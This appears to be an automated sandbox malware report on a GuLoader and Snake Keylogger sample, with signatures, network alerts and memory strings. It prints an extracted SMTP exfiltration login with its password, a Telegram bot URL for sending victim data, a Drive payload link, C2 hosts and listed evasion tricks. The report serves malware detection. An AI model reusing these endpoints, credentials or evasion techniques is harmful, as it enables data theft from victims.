Edit tour

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.23885.29286.exe

Overview

General Information

Sample name:	SecuriteInfo.com.FileRepMalware.23885.29286.exe
Analysis ID:	1611020
MD5:	48b03eaf0daf01e7e607c9ef2d4605e6
SHA1:	197c883e8f662c4f432f9b433cab6fbae45cb7cc
SHA256:	dde1528c732c07d5f7153dc871342bd4657836a7ccfe185e15af90c87dbf95a7
Tags:	exeuser-SecuriteInfoCom
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Joe Sandbox ML detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

SecuriteInfo.com.FileRepMalware.23885.29286.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe" MD5: 48B03EAF0DAF01E7E607C9EF2D4605E6)

SecuriteInfo.com.FileRepMalware.23885.29286.exe (PID: 5824 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe" MD5: 48B03EAF0DAF01E7E607C9EF2D4605E6)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@muriana.com", "Password": "Provisional123***", "Host": "mail.muriana.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.2946709290.00000000349D6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2946709290.00000000348D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1982445379.0000000005CF4000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: SecuriteInfo.com.FileRepMalware.23885.29286.exe PID: 6620	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
Process Memory Space: SecuriteInfo.com.FileRepMalware.23885.29286.exe PID: 5824	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.FileRepMalware.23885.29286.exe PID: 5824	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 1 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T12:45:11.295550+0100	2803305	3	Unknown Traffic	192.168.2.4	49742	104.21.64.1	443	TCP
2025-02-10T12:45:13.086717+0100	2803305	3	Unknown Traffic	192.168.2.4	49744	104.21.64.1	443	TCP
2025-02-10T12:45:19.555671+0100	2803305	3	Unknown Traffic	192.168.2.4	49785	104.21.64.1	443	TCP
2025-02-10T12:45:20.826442+0100	2803305	3	Unknown Traffic	192.168.2.4	49797	104.21.64.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T12:45:08.769532+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49739	193.122.6.168	80	TCP
2025-02-10T12:45:10.722641+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49739	193.122.6.168	80	TCP
2025-02-10T12:45:12.519471+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49743	193.122.6.168	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T12:44:57.962341+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49737	172.217.23.110	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T12:45:21.870733+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49803	149.154.167.220	443	TCP

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 10 Feb 2025 11:45:21 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000348D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000348D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000348D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000348D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000348D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000348D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20a
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2103985330.0000000004506000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2104050097.0000000004506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.0000000034A90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.0000000034A90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.0000000034A8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2926114780.0000000004498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2926114780.0000000004498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/4
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2926114780.00000000044D3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2926092748.0000000004480000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1nNVv0XzkB9FbgSCpCy-US3yz8JWGjhqn
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2926114780.00000000044D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1nNVv0XzkB9FbgSCpCy-US3yz8JWGjhqnw
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2139529173.0000000004542000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2926114780.0000000004500000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2139469458.0000000004506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2139469458.0000000004506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1nNVv0XzkB9FbgSCpCy-US3yz8JWGjhqn&export=download
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.000000003491C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349B3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.000000003498C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.000000003491C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.000000003498C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.0000000034946000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349B3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.000000003498C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2103985330.0000000004506000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2104050097.0000000004506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359F5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359A7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035C4E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B4B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035C29000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359F7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035982000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359AD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359F5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359A7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035C4E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B4B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035A1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035C29000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359F7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035982000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359AD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2103985330.0000000004506000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2104050097.0000000004506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2103985330.0000000004506000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2104050097.0000000004506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2103985330.0000000004506000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2104050097.0000000004506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2103985330.0000000004506000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2104050097.0000000004506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.0000000034AC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.0000000034AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.0000000034ABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 172.217.23.110:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49803 version: TLS 1.2

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052D1

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 0_2_00403358 EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,		0_2_00403358
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_00403358 EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,		4_2_00403358

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 0_2_00404B0E	0_2_00404B0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 0_2_0040653D	0_2_0040653D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_00404B0E	4_2_00404B0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_0040653D	4_2_0040653D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040FC478	4_2_040FC478
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040FC748	4_2_040FC748
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040FC1A8	4_2_040FC1A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040FD288	4_2_040FD288
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040F5380	4_2_040F5380
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040FCCE8	4_2_040FCCE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040F9E77	4_2_040F9E77
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040FCFB8	4_2_040FCFB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040F6FC8	4_2_040F6FC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040FE988	4_2_040FE988
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040F69E0	4_2_040F69E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040FCA18	4_2_040FCA18
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040FC46A	4_2_040FC46A
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040FC738	4_2_040FC738
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040FC19A	4_2_040FC19A
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040FD278	4_2_040FD278
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040F5370	4_2_040F5370
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040FCCD8	4_2_040FCCD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_040FCFAA	4_2_040FCFAA
